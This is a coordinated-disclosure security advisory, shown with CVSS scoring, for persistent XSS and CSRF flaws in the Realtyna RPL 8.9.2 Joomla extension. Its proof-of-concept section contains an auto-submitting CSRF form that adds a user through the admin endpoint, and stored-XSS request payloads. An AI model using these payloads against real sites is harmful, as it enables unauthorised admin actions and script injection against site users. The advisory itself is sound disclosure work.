Bikramaditya GuhaZSL-2015-5271Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
8.2 High
AI Score
Confidence
High
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.008 Low
EPSS
Percentile
81.7%
Title: Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities
Advisory ID: ZSL-2015-5271
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 22.10.2015
Summary
Realtyna CRM (Client Relationship Management) Add-on for RPL is a Real Estate CRM specially designed and developed based on business process and models required by Real Estate Agents/Brokers. Realtyna CRM intends to increase the Conversion Ratio of the website Visitors to Leads and then Leads to Clients.
Description
The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed via the multiple parameters is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.
Vendor
Realtyna LLC - <https://www.realtyna.com>
Affected Version
8.9.2
Tested On
Apache
PHP/5.4.38
Vendor Status
[05.10.2015] Vulnerability discovered.
[06.10.2015] CVE-2015-7714 and CVE-2015-7715 assigned.
[07.10.2015] Contact with the vendor.
[07.10.2015] Vendor responded asking for details.
[07.10.2015] Advisory and details sent to the vendor.
[08.10.2015] Vendor confirms the vulnerability scheduling patch release date.
[21.10.2015] Vendor releases version 8.9.5 to address these issues.
[22.10.2015] Coordinated public security advisory released.
PoC
Credits
Vulnerability discovered by Bikramaditya Guha - <[email protected]>
High five to lqwrm and crash!
References
[1] <http://rpl.realtyna.com/Change-Logs/RPL7-Changelog>
[2] <https://vulners.com/cve/CVE-2015-7715>
[3] <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7715>
[4] <https://cxsecurity.com/issue/WLB-2015100148>
[5] <https://www.exploit-db.com/exploits/38528/>
[6] <https://packetstormsecurity.com/files/134067>
Changelog
[22.10.2015] - Initial release
[24.10.2015] - Added reference [4], [5] and [6]
Contact
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities
Vendor: Realtyna LLC
Product web page: https://www.realtyna.com
Affected version: 8.9.2
Summary: Realtyna CRM (Client Relationship Management) Add-on
for RPL is a Real Estate CRM specially designed and developed
based on business process and models required by Real Estate
Agents/Brokers. Realtyna CRM intends to increase the Conversion
Ratio of the website Visitors to Leads and then Leads to Clients.
Desc: The application allows users to perform certain actions
via HTTP requests without performing any validity checks to
verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site. Multiple cross-site scripting vulnerabilities
were also discovered. The issue is triggered when input passed
via the multiple parameters is not properly sanitized before
being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in
context of an affected site.
Tested on: Apache
PHP/5.4.38
Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
Advisory ID: ZSL-2015-5271
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5271.php
Vendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog
CVE ID: CVE-2015-7715
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7715
05.10.2015
--
1. CSRF:
</p>
<title>CSRF POC</title>
<form action="http://localhost/administrator/index.php" id="formid" method="post">
<input name="option" type="hidden" value="com_rpl"/>
<input name="view" type="hidden" value="addon_membership_members"/>
<input name="format" type="hidden" value="ajax"/>
<input name="function" type="hidden" value="add_user"/>
<input name="id" type="hidden" value="85"/>
</form>
<script>
document.getElementById('formid').submit();
</script>
2. Cross Site Scripting (Stored):
http://localhost/administrator/index.php
POST parameters: new_location_en_gb, new_location_fr_fr
Payloads:
option=com_rpl&view=location_manager&format=ajax&new_location_en_gb=%22onmousemove%3D%22alert(1)%22%22&new_location_fr_fr=&level=1&parent=&function=add_location
option=com_rpl&view=location_manager&format=ajax&new_location_en_gb=&new_location_fr_fr=%22onmousemove%3D%22alert(2)%22%22&level=1&parent=&function=add_location
</body></html>Related
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
8.2 High
AI Score
Confidence
High
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.008 Low
EPSS
Percentile
81.7%